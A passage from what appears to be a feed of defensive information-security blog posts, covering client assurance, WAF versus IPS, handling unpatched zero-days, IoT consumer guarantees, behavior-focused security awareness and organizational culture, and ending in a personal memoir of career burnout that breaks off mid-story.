This means we have accepted the fact that an attack is pertinent if we are dealing with data/ information. Someone is observing to attempt a strike at the right time especially if you are a successful firm. Now, the assurance can be achieved by demonstrating the policies you have in place for Information Security and Enterprise Risk Management. These policies must be supplemented with standards which identify the requirements, wherein the procedures as the how-to document on the implementation. Most of the cases if you have to assure the client on your defence in depth, the security policy, architecture and previous third-party assessment/ audit suffice. In rare cases, a client may ask to perform its assessment of your infrastructure which is at your discretion. I would recommend making sure that your policy handles not only security but also incidence to reflect your preparedness for the breach/ attack.

On the other hand, if your end customers want assurance, you can entirely reflect that by being proactive on your product, blog, media etc. on how dedicated you are in securing their data. For example, the kind of authentication you support tells whether your commitment to protecting the vault. Whether it's mandated or not depends on the usability and UI, but to allow support shows your commitment to addressing the security-aware customers & understanding the need for the hour.

--
Published at https://www.timecamp.com/blog/index.php/2017/11/data-protection-tips/ with special thanks to Ola Rybacka for this opportunity.

Don’t be a security snob. Support your business team!

Don't be a security snob. Support your business team!

There have been many a times that access controls have been discussed in the meetings related to web development. With an interconnected world of APIs it is very important to understand the authentication of these end-points. One of the best approach I always vouch for is mutual authentication on SSL certificates (or 2 way SSL). Most of the times it is viable but it fails when either of party couldn't support it (hence not mutual). So, what to do when the business can't implement your "security requirement"?

The role of security is not to hinder the business, but to support it. It has to act as a pillar, and not a tollgate. We all know, that's audit!

Are you a security snob?
The rules/ regulations made by us, auditors and regulators are to make sure the architecture, implementation and roll-out is secure, and the information is tightly controlled. It is in no manner adding to the miseries of developers at the last stage of go-live. The security requirements must be clear right from the design phase. There must be a security architect appointed to work in accordance with the industry standards, and security nitty-gritties. Sometimes the security team gets to know that few important implementations have not been considered and now the project is at final stage. What should the security do - Shall it take business to the grinding halt? Shall it take the developers back to drawing board? No and no! Don't be a snob!

Look forward, and figure out the workarounds; strong mitigations steps to find a way to lower the risk. As long as you can lower the risk to minimum by using WAF, access controls, and white-listing etc. the business can make a plan to "fix" it in the next release. Make sure business understands the risk - brand or financial, and then if the risk is too high - involve the "C" suite executives, but support the business instead of bashing them with - you didn't do this, or that. It is counter-productive and doesn't help any party.

In most cases "business" accounts for the IT security paychecks and it's your (security team) job to avoid it looking like an overhead, but an investment!
IT security is NOT generating money. So don't point fingers, but hold hands!

Now, in the case of mutual authentication - what if the 2-way SSL is not available? Is IP white-listing a possible option with API credentials? Yes, if the IP is not shared by the whole network & the traffic is over secure channel. It's a strong measure to apply and restrict the participating parties to talk 1:1 on an encrypted channel. But then, I have been asked what if there is IP spoofing? Come'on guys! IP spoofing doesn't work the way you think. It's a TCP handshake; how do you expect the handshake to succeed when the IP doesn't ACK the SYN-ACK? Rememeber, the "actual IP" is not expecting the SYN-ACK & traffic will not go to the "malicious IP". So, IP spoofing over Internet is out of picture.

As a security specialist, try to understand that there are various ways to strengthen the security without being a pain in the ass. There are ways to implement compensatory controls; making sure the traffic is encrypted, access controls are tightly restricted, and risk is lowered significantly. If you can do this, you can definitely help business go live, and give them time to manage the security expectations more constructively.

Cheers, and be safe.

Design For Behavior, Not Awareness

October was National Cybersecurity Awareness Month. Since today is the last day, I figured now is as good a time as any to take a contrarian perspective on what undoubtedly many organizations just did over the past few weeks; namely, wasted a lot of time, money, and good will.

Most security awareness programs and practices are horrible BS. This extends out to include many practices heavily promoted by the likes of SANS, as well as the current state of "best" (aka, failing miserably) practices. We shouldn't, however, be surprised that it's all a bunch of nonsense. After all, awareness budgets are tiny, the people running these programs tend to be poorly trained and uneducated, and in general there's a ton of misunderstanding about the point of these programs (besides checking boxes).

To me, there are three kinds of security awareness and education objectives:
1) Communicating new practices
2) Addressing bad practices
3) Modifying behavior

The first two areas really have little to do with behavior change so much as they're about communication. The only place where behavior design comes into play is when the secure choice isn't the easy choice, and thus you have to build a different engagement model. Only the third objective is primarily focused on true behavior change.

Awareness as Communication

The vast majority of so-called "security awareness" practices are merely focused on communication. They tell people "do this" or "do that" or, when done particularly poorly, "you're doing X wrong idiots!" The problem is that, while communication is important and necessary, rarely are these projects approached from a behavior design perspective, which means nobody is thinking about effectiveness, let alone how to measure for effectiveness.

Take, for example, communicating updated policies. For example, maybe your organization has decided to revise its password policy yet again (woe be to you!). You can undertake a communication campaign to let people know that this new policy is going into effect on a given date, and maybe even explain why the policy is changing. But, that's about it. You're telling people something theoretically relevant to their jobs, but not much more. This task could be done just as easily be your HR or internal communication team as anyone else. What value is being added?

Moreover, the best part of this is that you're not trying to change a behavior, because your "awareness" practice doesn't have any bearing on it; technical controls do! The password policy is implemented in IAM configurations and enforced through technical controls. There's no need for cognition by personnel beyond "oh, yeah, I now have to construct my password according to new rules." It's not like you're generally giving people the chance to opt out of the new policy, and there's no real decision for them to make. As such, the entire point of your "awareness" is communicating information, but without any requirement for people to make better choices.

Awareness as Behavior Design

The real role of a security awareness and education program should be on designing for behavior change, then measuring the effectiveness of those behavior change initiatives. The most rudimentary example of this is the anti-phishing program. Unfortunately, anti-phishing programs also tend to be horrible examples because they're implemented completely wrong (e.g., failure to benchmark, failure to actually design for behavior change, failure to get desired positive results). Yes, behavior change is what we want, but we need to be judicious about what behaviors we're targeting and how we're to get there.

I've had a strong interest in security awareness throughout my career, including having built and delivered awareness training and education programs in numerous prior roles. However, it's only been the last few years that I've started to find, understand, and appreciate the underlying science and psychology that needs to be brought to bear on the topic. Most recently, I completed BJ Fogg's Boot Camp on behavior design, and that's the lens through which I now view most of these flaccid, ineffective, and frankly incompetent "awareness" programs. It's also what's led me to redefine "security awareness" as "behavioral infosec" in order to highlight the importance of applying better thinking and practices to the space.

Leveraging Fogg's models and methods, we learn that Behavior happens when three things come together: Motivation, Ability, and a Trigger (aka a prompt or cue). When designing for behavior change, we must then look at these three attributes together and figure out how to specifically address Motivation and Ability when applying/instigating a trigger. For example, if we need people to start following a better, preferred process that will help reduce risk to the organization, we must find a way to make it easy to do (Ability) or find ways to make them want to follow the new process (Motivation). Thus, when we tell them "follow this new process" (aka Trigger), they'll make the desired choice.

In this regard, technical and administrative controls should be buttressed by behavior design whenever a choice must be made. However, sadly, this isn't generally how security awareness programs view the space, and thus just focus on communication (a type of Trigger) without much regard for also addressing Motivation or Ability. In fact, many security programs experience frustration and failure because what they're asking people to do is hard, which means the average person is not able to do what's asked. Put a different way, the secure choice must be the easy choice, otherwise it's unlikely to be followed. Similarly, research has shown time and time again that telling people why a new practice is desirable will greatly increase their willingness to change (aka Motivation). Seat belt awareness programs are a great example of bringing together Motivation (particularly focused on negative outcomes from failure to comply, such as reality of death or serious injury, as well as fines and penalties), Ability (it's easy to do), and Triggers to achieved a desired behavioral outcome.

Overall, it's imperative that we start applying behavior design thinking and principles to our security programs. Every time you ask someone to do something different, you must think about it in terms of Motivation and Ability and Trigger, and then evaluate and measure effectiveness. If something isn't working, rather than devolving to a blame game, instead look at these three attributes and determine if perhaps a different approach is needed. And, btw, this may not necessarily mean making your secure choice easier so much as making the insecure choice more difficult (for example, someone recently noted on twitter that they simply added a wait() to their code to force deprecation over time)

Change Behavior, Change Org Culture

Another interesting aspect of this discussion on behavior design is this: organizational culture is the aggregate of behaviors and values. That is to say, when we can change behaviors, we are in fact changing org culture, too. The reverse, then, is also true. If we find bad aspects of org culture leading to insecure practices, we can then factor those back into the respective behaviors, and then start designing for behavior change. In some cases, we may need to break the behaviors into chains of behaviors and tackle things more slowly over time, but looking at the world through this lens can be quite enlightening. Similarly, looking at the values ensconced within org culture also let's us better understand motivations. People generally want to perform their duties, and do a reasonably decent job at it. This is generally how performance is measured, and those duties and performance measures are typically aligned against outcomes and - ultimately - values.

One excellent lesson that DevOps has taught us (there are many) is that we absolutely can change how the org functions... BUT... it does require a shift in org culture, which means changing values and behaviors. These sorts of shifts can be done either top-down or bottom-up, but the reality is that top-down is much easier in many regards, whereas bottom-up requires that greater consensus and momentum be built to achieve a breakthrough.

DevOps itself is cultural in nature and focuses heavily on changing behaviors, ranging from how dev and ops function, to how we communicate and interact, and so on. Shortened feedback loops and creating space for experimentation are both behavioral, which is why so many orgs struggle with how to make them a reality (that is, it's not simply a matter of better tools). Security absolutely should be taking notes and applying lessons learned from the DevOps movement, including investing in understanding behavior design.

---
To wrap this up, here are three quick take-aways:

1) Reinvent "security awareness" to be "behavioral infosec" toward shifting to a behavior design approach. Behavior design looks at Motivation, Ability, and Triggers in affecting change.

2) Understand the difference between controls (technical and administrative) and behaviors. Resorting to basic communication may be adequate if you're implementing controls that take away choices. However, if a new control requires that the "right" choice be made, you must then apply behavior design to the project, or risk failure.

3) Go cross-functional and start learning lessons from other practice areas like DevOps and even HR. Understand that everything you're promoting must eventually tie back into org culture, whether it be through changes in behavior or values. Make sure you clearly understand what you're trying to accomplish, and then make a very deliberate plan for implementing changes while addressing all appropriate objectives.

Going forward, let's try to make "cybersecurity awareness month" about something more than tired lines and vapid pejoratives. It's time to reinvent this space as "behavioral infosec" toward achieving better, measurable outcomes.

WAF and IPS. Does your environment need both?

WAF and IPS. Does your environment need both?

I have been in fair amount of discussions with management on the need for WAF, and IPS; they often confuse them and their basic purpose. It has been usually discussed after a pentest or vulnerability assessment, that if I can't fix this vulnerability - shall I just put an IPS or WAF to protect the intrusion/ exploitation? Or, sometimes they are considered as the silver bullet to thwart off the attackers instead of fixing the bugs. So, let me tell you - This is not good!

The security products are well suited to protect from something "unknown" or something that you have "unknowingly missed". It is not a silver bullet or an excuse to keep systems/ applications unpatched.

Security shouldn't be an AND/OR case. More the merrier only if they have been configured properly and each one of the product(s) has a different role to play under the flag of defense in depth! So, while I started this article as WAF vs. IPS - it's time to understand it's WAF and IPS. The ecosystem of your production environment is evolving and so is the threat landscape - it's more complex to protect than it was 5 years ago. Attackers are running at your pace, if not faster & a step ahead. These adversary as well piggy-back existing threats to launch their exploits. Often something that starts as simple as DDOS to overwhelm your networks, concedes in an application layer attack. So, network firewall, application firewall, anti-malware, IPS, SIEM etc. all have an important task and should be omnipresent with bells and whistles!

Nevertheless, whether it's a WAF or an IPS; each has it's own purpose and though they can't replace each other, they often have gray areas under which you can rest your risks. This blog will try to address these gray areas, and the associated differences to make life easier when it comes to WAF (Web Application Firewall) or IPS (Intrusion Prevention System). The assumption is both are modern products, and the IPS have deep packet inspection capabilities. Now, let's try to understand the infrastructure, environment and scope of your golden eggs before we can take a call which is the best way to protect the data,

  1. If you are protecting only the "web applications" running on HTTP sockets, then WAF is enough. IPS will be cherry on cake.
  2. If you are protecting all sorts of traffic - SSH, FTP, HTTP etc. then WAF is of less use at it can't inspect non HTTP traffic. I would recommend having a deep packet inspection IPS.
  3. WAF must not be considered as an alternative for traditional network firewalls. It works on the application layer and hence is primarily useful on HTTP, SSL (decryption), Javascript, AJAX, ActiveX, Session management kind of traffic.
  4. A typical IPS does not decrypt SSL traffic, and therefore is insufficient in packet inspection on HTTPS session.
  5. There is wide difference in the traffic visibility and base-lining for anomalies. While WAF has an "understanding" of traffic - HTTP GET, POST, URL, SSL etc. the IPS only understands it as network traffic and therefore can do layer 3/4 checks - bandwidth, packet size, raw protocol decoding/ anomalies but not the GET/ POST or session management.
  6. IPS is useful in cases where RDP, SSH or FTP traffic has to be inspected before it reaches the box to make sure that the protocol is not tampered or wrapped with another TCP packet etc.

Both the technologies have matured and have many gray areas of working but understand that WAF knows and capture the contents of HTTP traffic to see if there is a SQL injection, XSS or cookie manipulation but the IPS have very little or no understanding of the underlying application, therefore can't do much with the traffic contents. An IPS can't raise an alarm if someone is getting confidential data out, or even sending a harmful parameter to your application - it will let it through if it's a valid HTTP packet.

Now, with the information I just shared, try to have a conversation with your management on how to provide the best layered approach in security. How to make sure the network, and application is resilient to complex attacks and threats lurking at your perimeter, or inside.

Be safe.

I know I haven’t patched yet, and there’s a zero-day knocking at my door

I know I haven't patched yet, and there's a zero-day knocking at my door

Patching is important, but let's agree it takes time. It takes time to test & validate the patch in your environment, check the application compatibility with the software and the underlying services. And then, one fine day, an adversary just hacks your server due to this un-patched code while you are testing it. It breaks my heart and I wonder "what can be done in the delta period while the team is testing the patch"? Adversary on the other hand is busy either reversing the patch, or using a zero-day to attack the systems! I mean once a patch is released it's a race,

Either bad guys reverse it and release a working exploit, OR good guys test, verify and update their environment. A close game, always.

Technically, I wouldn't blame the application security team, or the one managing the vulnerable server. They have their SLA to apply updates on the OS or Application Servers. In my experience, a high severity patch has to be applied in 15 days, medium in 30 days, and low in 45 days. Now, if the criticality is too severe; it can should be managed in 24 to 48 hours with enough testing on functionality, compatibility, and test cases with application team; or server management team. Now, what to do when there is a zero-day exploit lurking in your backyard? It used to be a low-probability gamble, but now it's getting more realistic and frequent. The recent case of Apache Struts vulnerability has done enough damage for many big companies like Equifax. I already addressed this issue in a blog-post before, and the need for alternatives such as WAF in Secure SDLC.

What shall I do if there's a 0-day lurking in my backyard?

Yes, I know there's a zero day for your web-application or underlying server, and you are busy patching but what other security controls do you have in place?
Ask yourself these questions,

  1. Do I have understanding of the zero-day exploit? Is it affecting my application, or a particular feature?
  2. Do I have a product/ tool for prevention at the application layer for network perimeter that can filter bad requests - Network WAF (Web Application Firewall), Network IPS (Intrusion Prevention System) etc.?
  3. Do I have a product/ tool for prevention at the application layer for host - Host based IPS, WAF etc.
  4. Can I just take the application offline, while I patch?
  5. What's the threat model and risk appetite if the exploitation is successful?
  6. Can I brace for impact by lowering the interaction with other components, or by preventing it to spread across my environment?

Let's understand how these answers will support your planning to develop a resilient environment,

>> Understanding of the zero-day exploit

You know there's an exploit in the wild; but does your security team or devops guys take a look at it? Did they find the exploit and understood the impact on your application? It is very important to understand what are you dealing with before you plan to secure your environment. Not all exploits are in scope of your environment due to the limitations, frameworks, plugins etc. So, do research a bit, ask questions and accordingly work on your timelines. Best case, understand the pattern you have to protect your application from.

>> Prevention at the application layer for network perimeter

If you know what's coming to hit you, you can plan a strategy to block it as well. Blocking is more effective when it's at the perimeter - earlier the better. And, if you have done good research on the exploit, or the threat-vector that can affect you; please take a note of the pattern and find a way to block it at the perimeter while you patch the application.

>> Prevention at the application layer for host

There are sometimes even when you know the pattern, and the details on the exploit but still network perimeter is incapable of blocking it. Example, if the SSL offload is on the server/ load balancer. In this case make sure the server knows what is expected; blocks everything else including an anomaly. This can be achieved by Host based protection: IPS, or WAF.
Even a small thing like tripwire can monitor the directory, and files to make sure attacker is either not able to create files; or you get the alert at the right time to react. This can make a huge difference!

Note: Make sure the IPS (network/ host) is capable of in-depth packet filtering. If the pattern can be blocked on the WAF with a quick rule, do it and make sure it doesn't generate false positives which can impact your business. Also, do monitor the WAF for alerts which can tell you if there have been failed attempts by the adversaries. Remember, the attackers won't directly use their best weapon; usually it starts with "information gathering", or uploading files, or executing known exploits before customizing the case for their needs.

You have very high chances to detect adversaries while they are gathering insights about you. Keep a keen eye on any alert from production environment.

>> Taking application offline

Is it possible to take the offline while you patch the software? This depends on the fact what's the exposure of the application, what is the kind of CIA (Confidentiality, Integrity and Availability) rating and what kind of business impact assessment has been performed. If you think that taking it offline can speed up the process, and also reduce the exposure without hurting your business; do it. Better safe than sorry.

>> Threat model and risk appetite

You have to assess & perform threat modeling of the application. The reason it is required is not every risk is high. Not every application needs the same attention, and the vulnerable application may well be internal that will substantially reduce the exposure and underlying impact! Do ask your team - is the application Internet facing, how many users are using it, what kind of data is it dealing with etc. and act accordingly.

>> Brace for impact

Finally, if things still look blurred, start prepping yourself for impact. Try to minimize it by validating and restricting the access to the server. You can perform some sanity checks, and implement controls like,

  1. Least privilege accounts for application use
  2. Least interaction with the rest of production environment
  3. Restricted database requests and response to limit the data ex-filtration
  4. Keep the incident management team on high-alert.
Incident management - Are you sure you are not already breached?

Now, what are the odds that while you reading this blog, trying to answer all the questions and getting ready - you haven't already been compromised? Earlier such statement of incidents used to begin with "What if..." but now it says "When..." so, yeah make sure all your monitoring systems are reporting the anomalies and someone is monitoring it well. These tools are only good if some human being is responsibly validating the alerts. Once an alert is flagged red; a process should trigger to analyze and minimize the impact.
Read more about incident monitoring failures in my earlier blogpost. Don't be one of them.

Now, once you address these questions you must have a fairly resilient environment to either mitigate or absorb the impact. Be safe!

5 Ways to Future-Proof IoT Devices

The absence of regulation is what has resulted in the innovation of software we see today​. But as hardware and software merge, as the shelf life of software becomes the shelf life of hardware, we are going to need a number of guarantees to ensure that the benefits keep outweighing the risks.​

I have never replaced my thermostat. Nor the control system of my lights in my flat. People buy a new oven or refrigerator every 10 years, a new car every 20 years maybe. And these are all run by software, old software, with bugs. And that is “fine” (mind the quotes), to the extent that someone takes responsibility for the system or solution as a whole, the collection of all these parts with a single brand name on the box that is legally responsible. Now think IoT. Thousands of individual vendors who sit mostly abroad, offshore code development with for the most part a lack of teams, unity or any other form of structure or legal jurisdiction for that matter. Low to no profit margins for technology sold by the lowest bidder where neither the buyer nor the seller have any interest in security.

The chip-maker of the device says they just sell chips, the manufacturer says they just implemented the chips and put them on the board, the software makers build the software for maybe hundreds of chips, ignoring some of the extra features and weaknesses that come with certain components. The product ships and problems are found at a later stage either through design errors or implementation errors while implementing a piece of software that has vulnerabilities. And this is where we are today.

Not a single snowflake feels responsible for the avalanche.

So, five things I would like to see as part of a basic set of guarantees when purchasing some of these products in the future:

  1. Guaranteed life expectancy
    When IoT vendors say they offer “life time support,” it is not your life, or the product’s life. It is the life of the company. We saw this with Revolv last year. Guaranteeing a certain number of years of product focus, updates, community support e.g. forums, as well as guaranteeing that the device will work is paramount. This means tracking the life cycle of the technology inside the devices, ensuring whatever cloud services are being used will still be there and cannot be interrupted or hijacked afterwards
  2. Privacy and data handling transparency
    Inform the consumer where the data is being saved to i.e. physical country, how long the data will be there as well as what data is being saved and to what level of detail. Give the consumer the option to remove all data produced by the device if you can prove ownership of the device. I have no problems waiving some of my rights when telling the IoT vendor and potentially the world I like to make something that needs the pizza setting of my IoT oven Sunday morning, but inform me first. Will my data go to a European cloud or a US cloud and what laws can be enforced upon my data and the correlation based on my data
  3. Technology transparency
    To the extent possible, inform the consumer about what technology is being used with regards to e.g. open source software and licensed software. Food manufacturers have to ensure the correct labeling of their product as far as ingredients go. Why not technology for the individual parts or software components, at least to some extent so that consumers can make informed choices about what it is they can and want to use
  4. Security feature transparency
    Is the product allowing management through a cloud service with two-factor authentication? Or only Bluetooth, Wifi? Will it detect your neighbor trying to log on to your device? Can someone break into my device remotely? What kind of features the device has will hopefully in the future start influencing the buying behavior of the consumer. If you want all devices to only use the cloud for remote control then that should be a choice that can be made by looking at the box
  5. Planned obsolescence
    A more difficult one but an important one. For IoT that is more sensitive or even vital, a shut down process should be explored to be able to shut down the device when it has exceeded its life or has been declared end of life. When reliance becomes dependence then planning is required in order to ensure that the benefits and added value of the product can be sustained. This is easier with pace makers and other devices that receive a lot of care and tracking. But for other devices that are basically enable-and-forget, this implies being able to signal its remaining lifetime to the owner and thus implies knowing who the owner is. This last part might be a more difficult issue as it has been tried with for example tying domain names to people for the purpose of reporting abuse cases. Not only that, this would mean another potential privacy problem if the information is leaked. This is a sensitive topic but more discussion is needed to see how devices can be categorized and what the possibilities are. This can also lead to abuse from the vendor side. Printer and printer ink cartridge vendors were very quick in jumping on the planned obsolescence track being very quick in flagging printer ink cartridges as empty, forcing the customer to buy more. More discourse on this subject is needed from all sides: designers, vendors, suppliers and consumers.

Quit Talking About "Security Culture" – Fix Org Culture!

I have a pet peeve. Ok, I have several, but nonetheless, we're going to talk about one of them today. That pet peeve is security professionals wasting time and energy pushing a "security culture" agenda. This practice of talking about "security culture" has arisen over the past few years. It's largely coming from security awareness circles, though it's not always the case (looking at you anti-phishing vendors intent on selling products without the means and methodology to make them truly useful!).

I see three main problems with references to "security culture," not the least of which being that it continues the bad old practices of days gone by.

1) It's Not Analogous to Safety Culture

First and foremost, you're probably sitting there grinding your teeth saying "But safety culture initiatives work really well!" Yes, they do, but here's why: Safety culture can - and often does - achieve a zero-sum outcome. That is to say, you can reduce safety incidents to ZERO. This factoid is excellent for when you're around construction sites or going to the hospital. However, I have very bad news for you. Information (or cyber or computer) security will never be a zero-sum game. Until the entirety of computing is revolutionized, removing humans from the equation, you will never prevent all incidents. Just imagine your "security culture" sign by the entrance to your local office environment, forever emblazoned with "It Has Been 0 Days Since Our Last Incident." That's not healthy or encouraging. That sort of thing would be outright demoralizing!

Since you can't be 100% successful through preventative security practices, you must then shift mindset to a couple things: better decisions and resilience. Your focus, which most of your "security culture" programs are trying to address (or should be), is helping people make better decisions. Well, I should say, some of you - the few, the proud, the quietly isolated - have this focus. But at the end of the day/week/month/year you'll find that people - including well-trained and highly technical people - will still make mistakes or bad decisions, which means you can't bank on "solving" infosec through better decisions.

As a result, we must still architect for resiliency. We must assume something will breakdown at some point resulting in an incident. When that incident occurs, we must be able to absorb the fault, continue to operate despite degraded conditions, while recovering to "normal" as quickly, efficiently, and effectively as possible. Note, however, that this focus on resiliency doesn't really align well with the "security culture" message. It's akin to telling people "Safety is really important, but since we have no faith in your ability to be safe, here's a first aid kit." (yes, that's a bit harsh, to prove a point, which hopefully you're getting)

2) Once Again, It Creates an "Other"

One of the biggest problems with a typical "security culture" focus is that it once again creates the wrong kind of enablement culture. It says "we're from infosec and we know best - certainly better than you." Why should people work to make better decisions when they can just abdicate that responsibility to infosec? Moreover, since we're trying to optimize resiliency, people can go ahead and make mistakes, no big deal, right?

Part of this is ok, part of it is not. On the one hand, from a DevOps perspective, we want people to experiment, be creative, be innovative. In this sense, resilience and failure are a good thing. However, note that in DevOps, the responsibility for "fail fast, recover fast, learn fast" is on the person doing the experimenting!!! The DevOps movement is diametrically opposed to fostering enablement cultures where people (like developers) don't feel the pain from their bad decisions. It's imperative that people have ownership and responsibility for the things they're doing. Most "security culture" dogma I've seen and heard works against this objective.

We want enablement, but we don't want enablement culture. We want "freedom AND responsibility," "accountability AND transparency," etc, etc, etc. Pushing "security culture" keeps these initiatives separate from other organizational development initiatives, and more importantly it tends to have at best a temporary impact, rather than triggering lasting behavioral change.

3) Your Goal Is Improving the Organization

The last point here is that your goal should be to improve the organization and the overall organizational culture. It should not be focused on point-in-time blips that come and go. Additionally, your efforts must be aimed toward lasting impact and not be anchored around a cult of personality.

As a starting point, you should be working with org dev personnel within your organization, applying behavior design principles. You should be identifying what the target behavior is, then working backward in a piecemeal fashion to determine whether that behavior can be evoked and institutionalized through one step or multiple steps. It may even take years to accomplish the desired changes.

Another key reason for working with your org dev folks is because you need to ensure that anything "culture" that you're pursuing is fully aligned with other org culture initiatives. People can only assimilate so many changes at once, so it's often better to align your work with efforts that are already underway in order to build reinforcing patterns. The worst thing you can do is design for a behavior that is in conflict with other behavior and culture designs underway.

All of this is to underline the key point that "security culture" is the wrong focus, and can in some cases even detract from other org culture initiatives. You want to improve decision-making, but you have to do this one behavior at a time, and glossing over it with the "security culture" label is unhelpful.

Lastly, you need to think about your desired behavior and culture improvements in the broader context of organizational culture. Do yourself a favor and go read Laloux's Reinventing Organizations for an excellent treatise on a desirable future state (one that aligns extremely well with DevOps). As you read Laloux, think about how you can design for security behaviors in a self-managed world. That's the lens through which you should view things, and this is where you'll realize a "security culture" focus is at best distracting.

---
So... where should you go from here? The answer is three-fold:
1) Identify and design for desirable behaviors
2) Work to make those behaviors easy and sustainable
3) Work to shape organizational culture as a whole

Definitionally, here are a couple starters for you...

First, per Fogg, Behavior happens when three things come together: Motivation, Ability (how hard or easy it is to do the action), and a Trigger (a prompt or cue). When Motivation is high and it's easy to do, then it doesn't take much prompting to trigger an action. However, if it's difficult to take the action, or the motivation simply isn't there, you must then start looking for ways to address those factors in order to achieve the desired behavioral outcome once triggered. This is the basis of behavior design.

Second, when you think about culture, think of it as the aggregate of behaviors collectively performed by the organization, along with the values the organization holds. It may be helpful, as Laloux suggests, to think of the organization as its own person that has intrinsic motivations, values, and behaviors. Eliciting behavior change from the organization is, then, tantamount to changing the organizational culture.

If you put this all together, I think you'll agree with me that talking about "security culture" is anathema to the desired outcomes. Thinking about behavior design in the context of organizational culture shift will provide a better path to improvement, while also making it easier to explain the objectives to non-security people and to get buy-in on lasting change.

Bonus reference: You might find this article interesting as it pertains to evoking behavior change in others.

Good luck!

Confessions of an InfoSec Burnout

Soul-crushing failure.

If asked, that is how I would describe the last 10 years of my career, since leaving AOL.

I made one mistake, one bad decision, and it's completely and thoroughly derailed my entire career. Worse, it's unclear if there's any path to recovery as failure piles on failure piles on failure.

The Ground I've Trod

To understand my current state of career decrepitude, as well as how I've seemingly become an industry pariah...

I have worked for 11 different organizations over the past 10 years. I left AOL in September 2007, right before a layoff (I should have waited for the layoff and gotten a package!). I had been there for more than 3.5 years and I was miserable. It was a misery of my own making in many ways. My team manager had moved up the ranks, leaving an opening. All my teammates encouraged me to throw my hat in the ring, but I demurred, telling myself I simply wasn't ready to manage. Oops. Instead, our new manager came through an internal process, and immediately made life un-fun. I left a couple months later.

When I left AOL, it was to take a regional leadership role in BT-INS (BT Global Services - they bought International Network Services to build-out their US tech consulting). A month into the role as security lead for the Mid-Atlantic, where I was billable on day 1, the managing director left and a re-org merged us in with a different region where there was already a security lead. 2 of 3 sales reps left and the remaining person was unable and unwilling to sell security. I sat on the bench for a long time, traveling as needed. An idle, bored Ben is a bad thing.

From BT I took a leadership role with this weird tech company in Phoenix. There was no budget and no staff, but I was promised great things. They let me start remote for a couple months before relocating. I knew it was a bad fit and not a good company before we made the move. I could feel it in my gut. But, I uprooted the family in the middle of the school year (my wife is an elementary teacher) and went to Phoenix, ignoring my gut. 6 months later they eliminated the position. The fact is that they'd hired a new General Counsel who also claimed a security background (he had a CISSP), and thus they made him the CISO. The year was 2009, the economy was in tatters after the real estate bubble had burst. We were stranded in a dead economy and had no place to go.

Thankfully, after a month of searching, someone threw me a life-line and I promptly started a consulting gig with Foreground Security. Well, that was a complete disaster and debacle. We moved back to Northern Virginia and my daughter immediately got sick and ended up in the hospital (she'd hardly had a sniffle before!). By the time she got out of the hospital I was sicker than I'd ever been before. The doctors had me on a couple different antibiotics and I could hardly get out of bed. This entire time the president of the company would call and scream at me every day. Literally, yelling at the top of his lungs over the phone. Hands-down the most unprofessional experience I'd had. The company partnership subsequently fell apart and I was kacked in the process. I remember it clearly to this day: I'm at my parents house in NW MN over the winter holidays and the phone rings. It's the company president, who starts out by telling me they'd finally had the kid they were expecting. And, they're letting me go. Yup, that's how the conversation went ("We had a baby. You're termed.").

Really, being out of Foreground was a relief given how awful it had been. Luckily they relocated us no strings attached, so I didn't owe anything. But, I once again was out of a job for the second time in 3 months. I'd had 3 employers in 2009 and ended the year unemployed.

In early 2010 I was able to land a contract gig, thinking I'd try a solo practice. It didn't work out. The client site was in Utah, but they didn't want to pay for a ton of travel, so I tried working remotely, but people refused to answer the phone or emails, meaning I couldn't do the work they wanted. The whole situation was a mess.

Finally, I connected with Peter Hesse at Gemini Security Solutions to do a contract-to-hire tryout. His firm was small, but had a nice contract with a large client that helped underpin his business. He brought me in to do a mix of consulting and biz dev, but after a year+ of trying to bring in new opportunities (and have them shot down internally for various reasons), I realized that I wasn't going to be able to make a difference there. Plus, being reminded almost daily that I was an expensive resource didn't help. I worked my butt off but in the end it was unappreciated, so I left for LockPath.

The co-founders of LockPath had found me when I was in Phoenix thanks to a paper I'd written on PCI for some random website. They came out to visit me and told me what they were up to. I kept in touch with them over the years, including through their launch of Keylight 1.0 on 10/10/10. I somewhat forced my way into a role with them, initially to build a pro svcs team, but that got scrapped almost immediately and I ended up more in a traveling role, presenting at conferences to help get the name out there, as well as doing customer training. After a year-and-a-half of doing this, they hired a full-time training coordinator who immediately threw me under the bus (it was a major wtf moment). They wanted to consolidate resources at HQ and moving to Kansas wasn't in the cards, so seeing the writing on the wall I started a job search. Things came to an end in mid-May while I was on the road for them. I remember it clearly, having dropped my then-3yo daughter with the in-laws the night before, I had just gotten into my hotel room in St. Paul, MN, ahead of Secure360 and the phone rang. I was told it was over, but he was going to think about it overnight. I asked "Am I still representing the company when I speak at the conference tomorrow?" and got no real answer, but was promised one first thing the next morning. That call never came, so I spoke to a full room the next morning and worked the booth all that day and the morning after that. I met my in-laws for lunch to pick-up my kiddo, and was sitting in the airport awaiting our flight home when the call finally came in delivering the final news. I was pretty burned-out at that time, so in many ways it was welcome news. Startup life can be crazy-intense, and I thankfully maintain a decent relationship with the co-founders today. But those days were highly stressful.

The good news was that I was already in-process with Gartner, and was able to close on the new gig a couple weeks later. Thus started what I thought would be one of my last jobs. Alas, I was wrong. As was much with my time there.

It bears noting here before I go any further an important observation: The onboarding experience is all-important. If you screw it up, then it sets a horrible tone for the entire gig, and the likelihood of success drops significantly. If onboarding is professional and goes smoothly, then people will feel valued and able to contribute. If it goes poorly, then people will feel undervalued from the get-go and they will literally start from an emotional hole. Don't do this to people! I don't care if you're a startup or a Fortune 50 large multi-national. Take care of people from Day 1 and things will go well. Fail at it and you'd might as well stop and release them asap.

Ok, anyway... back to Gartner. It was a difficult beginning. I was assigned a mentor, per their process, but he was gone 6 of the first 9 weeks I was there. I was sent to official "onboarding training" the end of August (the week before Labor Day!) despite having been there for 2 months by that time. I was not prepped at all before going to onboarding, and as it turns out I should have been. Others showed up with documents to be edited and an understanding of the process. I showed up completely stressed out, not at all ready to do the work that was expected, and generally had a very difficult time. It was also the week before Labor Day, which at the time meant it was teacher workshops, and I was on the road for it with 2 young kids at home. Thankfully, the in-laws came and helped out, but suffice to say it was just really not good all-around.

